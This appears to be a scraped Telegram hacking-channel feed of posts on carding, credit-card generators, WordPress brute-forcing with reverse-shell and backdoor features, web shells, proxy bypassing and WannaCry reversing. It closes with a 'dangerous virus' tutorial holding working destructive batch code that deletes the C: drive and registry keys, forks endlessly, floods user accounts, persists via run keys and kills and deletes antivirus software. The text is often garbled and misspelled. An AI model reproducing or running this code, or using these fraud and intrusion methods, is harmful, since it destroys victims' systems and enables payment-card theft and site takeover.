UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.6K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Web & Services:
Undercode.help
Download Telegram
UNDERCODE COMMUNITY pinned «——————undercOde—————— 🦑SECRET CARDING Methode Not patched ☠️☠️☠️☠️☠️ (Follow us instagram.com/UnderCodeTestingCompany) 🦑Amazon Carding New 2k18 March method Fresh and New and Highly working Method created by top carders in world. Note: All other methods…»
--------UNDERCODE-----

WEBSITE Full Vulnerability scan & EXPLOITE :
(Twitter.com/UnderCodeTC)

🦑Vulnerability Checks:

1)
DNS/HTTP Load Balancers & Web Application Firewalls.

2) Checks for Joomla, WordPress and Drupal

3) SSL related Vulnerabilities (HEARTBLEED, FREAK, POODLE, CCS Injection, LOGJAM, OCSP Stapling).

4) Commonly Opened Ports.

5) DNS Zone Transfers using multiple tools (Fierce, DNSWalk, DNSRecon, DNSEnum).

6) Sub-Domains Brute Forcing.

7)Open Directory/File Brute Forcing.

8) Shallow XSS, SQLi and BSQLi Banners.

9) Slow-Loris DoS Attack, LFI (Local File Inclusion), RFI (Remote File Inclusion) & RCE (Remote Code Execution).

> & more...

🦑Requirements

1)
Python 2.7

2) Kali OS (Preferred, as it is shipped with almost all the tools)

3)For other OS flavours, working on a docker support.

🦑INSTALLISATION& RUN:

1) Download the script and give executable permissions

> git clone https://github.com/skavngr/rapidscan

2) wget -O rapidscan.py https://raw.githubusercontent.com/skavngr/rapidscan/master/rapidscan.py

3)chmod +x rapidscan.py

4) python rapidscan.py


Written by Steave(tm)
-----UNDERCODE------
-------UNDERCODE------

CREDIT CARD HACK ON TERMUX(For eductational purposes)
(Instagram.com/UnderCodeTestingCompany)


🦑INSTALLISATION & RUN:

> Credit Card Information Generate Hacking Tool to Termux

1) pkg update

2) pkg upgrade

3) pkg install python

4) pkg install git

5) git clone https://github.com/INDOnimous/Card-Number

6) cd Card-Number

7) ls

8)chmod 777 Card.sh

9)./Card.sh

[#]Count : 10
[#] Delay : 2

@ Steave(t.m)
--------UNDERCODE-----
————-UNDERCODE—————-

NEW UPDATE IN C I A BREAKED THEN SHARED HACK TOOL ☠️☠️EXPERT
+ CIA ACCESS SERVER BY CIA ITSELF
(T.me/UnderCodetestingOfficial)

🦑INSTALLISATION:

🦑 Running docker image

1) Docker repository : https://hub.docker.com/r/hack23/cia/

2) docker run hack23/cia:2019.10.3 -p 28443:8443

3) Access server at https://localhost:28443/cia/ , register new user to get admin access

🦑Installing Debian/Ubuntu package:

1) Currently only build a debian package, works with debian and ubuntu 14.04,16.04,16.10

2) Installing database(postgres) and openjdk

> sudo apt-get install openjdk-11-jdk postgresql-11 pgadmin3

3) Postgresql on Ubuntu
> sudo apt-get install postgresql-11 postgresql-contrib postgresql-11-pgaudit

4) Create empty database
Below description set the default username/password and database name used for development, recommend using custom credentials and update the configuration at /opt/cia/webapps/cia/WEB-INF/database.properties to define your own username/password and database name.

5) sudo su - postgres

6) psql

> postgres=# CREATE USER eris WITH password 'discord';

> postgres=# CREATE DATABASE cia_dev;

> postgres=# GRANT ALL PRIVILEGES ON DATABASE cia_dev to eris;

7) Modify postgres setting, enable prepared transactions and extensions used pg_stat_statements, pgaudit, pgcrypto

8) Edit file "/etc/postgresql/11/main/postgresql.conf" set

9) max_prepared_transactions = 100
shared_preload_libraries = 'pg_stat_statements, pgaudit, pgcrypto'
pgaudit.log = ddl
pg_stat_statements.track = all
pg_stat_statements.max = 10000
Modify postgres setting Edit file "/etc/postgresql/11/main/pg_hba.conf" add line

10) host all all ::1/128 md5
Restart postgres

11) service postgresql restart
Get cia debian package and

12) wget https://oss.sonatype.org/content/repositories/releases/com/hack23/cia/cia-dist-deb/2019.10.3/cia-dist-deb-2019.10.3.deb

13) install debian package

>sudo dpkg -i cia-dist-deb-2019.10.3.deb

14) Access the server at https://localhost:28443/cia/ .

Written by Steave(t.m)
————-UNDERCODE—————-
------UNDERCODE------

BEST TOOL FOR Gether informations
(in my point better than redhawk)
(Instagram.com/UnderCodetestingCompany)

🦑INSTALLISATION&RUN:
(Kali/termux(root)...

> KALI LINUX INSTALL:

1) git clone https://github.com/1N3/Sn1per

2) cd Sn1per

3) bash install.sh

🦑UBUNTU/DEBIAN/PARROT INSTALL:

1)sudo bash install_debian_ubuntu.sh

🦑DOCKER INSTALL:

From a new Docker console, run the following commands.

1) Download https://raw.githubusercontent.com/1N3/Sn1per/master/Dockerfile
docker build -t sn1per-docker .
docker

> run -it sn1per-docker /bin/bash

@ Mr.Botnet
----UNDERCODE----
SHARE OUR CHANNEL WITHOU.YOUR FRIENDS t.me/UnderCodeTestingOfficial 👍
———-UNDERCODE———-

WANNACRY THE FAMOUS RANSOMWARE REVERSE ENGENEER TOOL BY NSA : FOR EXPERTS HACKERS HOW Does Undercode DECRYPT it :
GUIDE BY undercOde:
(Twitter.com/UnderCodeTC)

🦑INSTALLISATION & RUN:

FOLLOW STEPS CAREFULLY OR YOU LOST YOUR FILES:

1) Make sure to turn off the Windows Defender before you install WannaCry and download an outdated Windows 10 VM.
Once you run the WannaCry.exe, this is how you will be welcomed with the infamous WannaCry screen.

2) Let’s load WannaCry executable into Ghidra and see what’s inside 😉
Download WannaCry zip file

> OFFICIAL SITE:
https://www.ghidra.ninja/samples/wannacry.zip

3) UNZIP

THEN OPEN PROJECT (wannacry)
(If you want edit some line for special configuration)

In any reverengeneer tool or (netbeen aw well)

4) After this double click on WannaCry to open in code browser. The code browser looks convenient though. On the left, you get to see the disassembly view and on the right, you get to see the decompile view.

5)Start with analyzing the executable and you might have to check/enable few options, Decompiler Parameter ID and WindowsPE x86 Propagate External Parameter option as the additional analyzer.

6) Once done, hit analyze and ignore warnings if any. This is how the Ghidra looks after analyzing.


7) Once done, we can start digging into the binary and look for the main function or the main entry function.

8) We don’t see any main() function or WinMain() function. But I see a function with label entry. Let’s see what’s inside the function with label entry, which is, of course, the function first called when executable is launched. This is the default entry code generated for windows executables.


9) WinMain() is the C entry point function of any windows application. Like normal DOS/console based application which has main() function as C entry point, in windows we have WinMain() instead. WinMain() is a function which is called by system during creation of a process.
If you have never heard of WinMain() functions here is a nice article on WinMain() function and how it works.


10)If you notice carefully, there at the bottom of this file, there’s a call to another function (Line 64).

11) If I open the same in Function Call Graph, here is what the call from entry function looks like

12) The function Call graph tool is really cool and convenient to see which function calls are being called from a particular function. I checked all the functions and really didn’t find anything useful except for the function FUN_00408140.

13) Checking the function call graph for FUN_00408140 reveals the other functions its calling.

14) Example renamed the function FUN_00408140() to something_interesting().
Once you open the function something_interesting(), one can see the strange string

15) From the function call graph, it makes clear that it's making a call to two functions InternetOpenA() and InternetOpenUrlA(). Let’s see what these two functions do.

> Microsoft’s documentation says that
InternetOpenA() function is used to initialize the application’s use of the WinINet functions!
And InternetOpenUrlA() function is used for opening a resource specified by a complete FTP or HTTP URL. Which makes sense! 🤔

16) Make sure to check out Microsoft's documentation for InternetOpenA() and InternetOpenUrlA().
Let’s change the function signature for both of these functions.

17) Now, we change the function signature for InternetOpenUrlA(), we get the error saying “Cannot Resolve the datatype HINTERNET”, it’s because this returns the type HINTERNET which is nothing but a void pointer.

18) Now I create the new typedef called HINTERNET.

19) Now you are good to change the function signature.
Once we change the function signature, this is how the decompiled code looks like20) Looking at line 23 this makes it obvious that it’s making a request to the strange URL we saw earlier! Line number 24 hints us that, if the request fails, it returns the null handle and then it closes the handle and calls the function FUN_00408090(). This is where all the exciting things are happening. Let me rename that to real_things_happens_here().
If the request doesn’t fail, it simply closes the handle and quits the program. (Line 30–32)🦑

21) Now, if you are wondering, what is this URL, this is the infamous killswitch. This was initially discovered by a hacker Marcus Hutchins aka MalwareTech. He worked on to reverse Engineer the WannaCry and discovered that the ransomware checks for the above URL.

22) Once he registered the domain for himself, it turned out that WannaCry was shut down. It so happened that the domain was unregistered and inactive. Once the ransomware checked the URL and found that it was active, the ransomware was shut down.

This is how basically how it worked!

Don t Copy Our Tutorial Without Permission
@ Mr.BotNet(t.m)
————-UNDERCODE————
--------UNDERCODE-----

🦑 bypass proxy server in LAN:
(T.me/UnderCodeTestingOfficial)

🦑Method 1:

1) Bypassing Via Browsers
When everything else seems all right, the only thing you have to do is disable the proxies in your web browsers.

2) In Firefox, go to “Options -> Advanced -> Connection Settings.”

3) Enable no proxy access, refresh your browser and surf the websites.

4) Chrome users should visit “Settings -> Advanced -> System.” Here, click on “Open Proxy Settings.”


5) A new “Internet Properties” window will open. Click “LAN Settings” and uncheck everything in the second window.

6) Refresh the Chrome browser and surf the website.

🦑Methode 2:

>Command Line Tracert

1) If the above method did not work for you, it means the URLs have been blocked.

2) In such cases you can try accessing the website through its IP address.

> Go to command line, type tracert www.url.com and hit Enter.

3) Soon the website will return its IP address. Enter the IP address on the address bar to access the website.

4)In some admin settings, you might not be able to access the command file. In such a case, simply run

>cmd as a batch file.

5) Open Notepad, type the words cmd and save it as “cmd.bat” in “All files.” This should now run as your command file.

🦑Method 3: Chrome VPN Extensions


1) For Chrome users, another method to bypass the settings is to use VPN extensions. Free VPN is one of the reliable extensions which works well.

2) You can choose from hundreds of extensions and not have to worry about slow speed ad bandwish

🦑Method 4: Fresh Proxies

1) Network administrators have a habit of blocking external proxies. However, that is where “fresh proxies” come in real handy.

2( You can do a simple Google search for them. I personally find “free-proxy.cz” quite useful in discovering new proxy servers.

3) Simply look for a reliable proxy, and note down its IP address and port number.

4) Go back to the LAN settings again, except this time you must check the box for “use a proxy server for your LAN.”

5) Then, insert the values into the required fields and start accessing the website.

🦑Method 5: Use Tor:

1) The Tor browser is one of the best ways to get around proxy restrictions. Freely available, you can surf anonymously and not leave a trace revealing your browsing activities.

2) Tor browsers are also malware-free,but you might want to hide it somewhere if on a shared computer.

🦑Hack Methods/

1) While these methods do not qualify as proxy bypasses, they are quite useful in helping you access what you want.
Use Google Translate: Go to Google Translate and convert the website into another language.

2) Once done, all you have to do is see the “original.” This way you can read the content in English under a new URL. 

3) You can also use Microsoft’s Bing translation service.

@ Mr. BotNet(t.m)
-------UNDERCODE------
————undercOde———-

🦑Hack WordPress WebSites Tested
(instagram.com/UnderCodeTestingCompany)

🦑INSTALLISATION & RUN:

1) git clone https://github.com/n00py/WPForce

2)cd WPForce

3)Yertle requires the requests libary to run.
http://docs.python-requests.org/en/master/user/install/

4)python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"

5)For Using i Prefere to get Wordlist at Files SENDED BELow bt UnderCode (4 gb Torrent)

🦑TESTED ON:

1)Ubanto

2) Debian

3) Kali

4) Parrot

🦑FEATURES:

1) Brute Force via API, not login form bypassing some forms of protection

2) Can automatically upload an interactive shell

3) Can be used to spawn a full featured reverse shell

4) Dumps WordPress password hashes

5) Can backdoor authentication function for plaintext password collection

6) Inject BeEF hook into all pages

7) Pivot to meterpreter if needed

Written by Mr. BotNet(t.m.)
———undercOde———
crackstation.txt.gz.torrent
42.3 KB
4 Gb WordlIST crack Torrent @UnderCodeTestingOfficial
- - - - - -undercOde- - - - -

🦑🆆🅷🅰️🆃 🅸🆂 🆆🅴🅱️🆂🅷🅴🅻🅻 🅿️🅷🅿️ 🆅🅸🆁🆄🆂 & 🅷🅾️🆆 🆃🅾️ 🆄🆂🅴 🅱️🆈 🆄🅽🅳🅴🆁🅲🅾️🅳🅴 ?
(t.me/UnderCodeTestingOfficial)

🦑 Let s start with Small Definition:
(Anyone called Hacker should he know this)

1) A web shell can be written in any language supported by the target web server.

2) The most usually observed web shells are written in widely supported languages, such as PHP and ASP. Perl, Python, Ruby, and Unix shell scripts are also used.

3) A web–shell itself cannot attack or exploit a remote vulnerability, so it is always the second step of an attack.

🦑🅷🅾️🆆 🆆🅴🅱️ 🆂🅷🅴🅻🅻 🅴🆇🅿️🅻🅾️🅸🆃🆂 🅰️🆁🅴 🆄🆂🅴🅳 🅱️🆈 🅰️🆃🆃🅰️🅲🅺🅴🆁🆂?

1) Web shells are frequently used in trade offs because of the combination of remote access and features. Even simple web hulls can have a huge impact and often maintain a minimal presence.

2)To Gain Persistent Remote Access To Control Server

3)To Execute Privilege Escalation:

Unless a server is misconfigured, the web shell will run under the Web server’s user permissions, which are (or at least should be) limited. Using a web shell, an attacker can attempt to perform elevation of privilege attacks by exploiting local system vulnerabilities

4)To Setup Zombie Botnet For DDOS attacks

🦑🅲🅾️🅼🅼🅾️🅽 🆃🅰️🅲🆃🅸🅲🆂 🆄🆂🅴🅳 🆃🅾️ 🅴🆇🅴🅲🆄🆃🅴 🆆🅴🅱️ 🆂🅷🅴🅻🅻 🅿️🅷🅿️ 🅴🆇🅿️🅻🅾️🅸🆃

Web shells can be delivered through a number of Web application exploits or configuration weaknesses, including:

1)SQL injection;

2)Intersite script;

3) WordPress vulnerabilities in applications/services;

4) WordPress file processing vulnerabilities (for example, download filtering or assigned permissions);

5) WordPress vulnerabilities included files (RFI) and local files included (LFI);

6) Exposed administration interfaces (possible areas to find the vulnerabilities mentioned above).

@͓̽ ͓̽M͓̽r͓̽z͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽
——UNDERCODE------
Windows 7 😁
- - - - - - ยภ๔єгς๏๔є- - - - - -

🦑 Set window on top, make it dark, transparent and more auto customize (For all Windows Version):
Paid theme For Free In UnderCode:
(follow us Twitter.com/UnderCodeTC)

🦑🄻🄴🅃 🅂 🅂🅃🄰🅁🅃:

1) Download https://github.com/gileli121/WindowTop-Web-Installer/releases/tag/05-31-19

2)The installer will also download for you offline installer.

3) You can use the software in 2 ways:

*Download Autoit and run the WindowTop.au3 file as it is

*Download compiled exe file of the software

🦑🅃🄴🅂🅃🄴🄳 🄱🅈 🅄🄽🄳🄴🅁🄲🄾🄳🄴 🄾🄽:

1)Windows 10

2)Windows 7


🦑Trouble in Install
>https://youtu.be/En9JtAn8nRY

ENJOY 😊


@̶̫̱̍͊͜ ̸̛͠ ̝̹̞̻̩̲M̶̛̪̰̻͎̼̆̄̈́͘̕ṙ̵͚̦̘̦͇͇̣͔̓ͅͅ.̶̍̎ ̩̟̜̟͓͛͐͂͜ ̴̨̙͓̦̫̲̯́̀̉͑̓͛̈̚͠͝ͅB̵̅ ̹o̵̞͇̠̠̜͒́̓̏͒̽̽́͛͝t̷ ̛̲̲͑͗̀n̶̛̐͌̒ ̝͓͎̰̻̦e̴̠͑̆̈́̅͛̈́̐t̴̎̓́ ̠̬͖̮͈͈͇͌ͅ(̵̨̠͉͈̹̞͖͒̈́̽̈́t̴ ̹͒̽̈́̽̒̀̒̕͝.̸̨͓̭̈́̍͒m̶̒ ̢͖͇͚̑.̷̪̩̬̣̬̑̏͋̎

- - - - - - ยภ๔єгς๏๔є- - - - -
- - - - - - -U҉N҉D҉E҉R҉C҉O҉D҉E҉ - - - - - -

🦑░H░o░w░ ░C░r░e░a░t░e░ ░D░a░n░g░e░r░o░u░s░ ░V░i░r░u░s░ ░b░y░ ░u░n░d░e░r░c░O░d░e░:
(Facebook.com/UnderCodeTestingCompanie)

🦑For this tutorial to create simple Notepad Virus you don’t need to be a die-hard programmer or something like that, but a basic knowledge of flow charts and loops helps you a lot to understand what’s going on here. So let’s start to create a trojan virus using notepad to run via command prompt(cmd) in Windows 10, 8/8.1, 7 or XP.

🦑𝐥𝐞𝐭 𝐬 𝐒𝐭𝐚𝐫𝐭:

1)Now, Open the Notepad application and Copy (Ctrl+C) and Paste (Ctrl+V) the codes given Written below one by one for the different virus in a different file.

>Code :
@Echo off
Del C: \ *.* || y

>Copy (Ctrl+C) and Paste (Ctrl+V) the source code)

2) I am not responsible for any damage or error reporting on Your PC, do it at your own risk.

3)𝘾𝙤𝙙𝙚𝙨:

A) Disable Internet Permanently

>This code will disable the internet connectivity permanently.

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

B) Delete Key Registry Files

This will delete key registry files, then loops a message

This is dangerous and unrecoverable Notepad Virus.

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your Dad.
GOTO MESSAGE

C) Endless Notepads

T>his will pop up endless notepads until the computer freezes and crashes

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Popping CD Drives

This will make the CD drives constantly pop out

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

D) ░E░n░d░l░e░s░s░ ░E░n░t░e░r░ ░U░n░d░e░r░C░o░d░e░

This will make the enter button pressed continuously

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

E) Application Bomber

It will start to open different applications repeatedly which will affect the system’s performance.

You can also add the application of your choice in the above code.

@echo off
:x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

F)Folder Flooder

This will create unlimited no. of folders.

@echo off
:x
md %random%
/folder.
goto x

G)User Account Flooder

This will create large no. of the user account on one’s PC and goes on

@echo off
:xnet
user %random% /add
goto x

H) Process Creator

This will create unlimited background processes

%0|%0

10.Windows Hacker

This will delete your whole C:\ drive and it really unrecoverable

@Echo off
Del C:\ *.* |y

10+. Anti Virus Disabler

This large code will disable any antivirus installed on the system
@ echo off
rem
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.datcls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda
software\*.*
rem

@̸͇̱̘͆͑́̎͑̆͘͘ͅ ̶̡̤̲̰̲̗̜̈́M̸͇̪̜̃̂̄r̵̋͗̀̎ ̟͖̫̙̪͖̥̦̀̌́̈́͜ͅ.̸̧̛̱̘̝̌͋͗̄̅́̾̌ ̷ ̧̦̫̯̻̻̮̜̈̽͆̋B̴̭͕̲̲̲̎̏̈̍͂͘ͅ o̷͓͓̣̤͆ͅt̷̛̜̹̰̜̦̠͑̓̓͒͠ ̼̲̹N̵̢̩̰̠͊͂̈́̽͜ȩ̶͍̲͙͊̈́͌͑̈́̎̆̕̚t̶͂̋̀̓͠ ͓́͋ ̶̨͙̞̩̞̖̽̌́̾̐̕(̵̩͎͈̹͚͇̘͙͘ẗ̴̟͇́̀͊̐̚ ̼̥̮.̸̘̗͎͊͜͝m̷͆ ̪͔̜̹͊͛̈̾͠.̶̯̥͚̩͐͂̈́̔̀̈́̒)̷̹͕̣̙͙̲̭̍̑̏̈́̒

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
FULL GUIDE PROGRAMMING NOT NOT NESSASARY CREATE DANGEROUS VIRUS NOTPAD☠️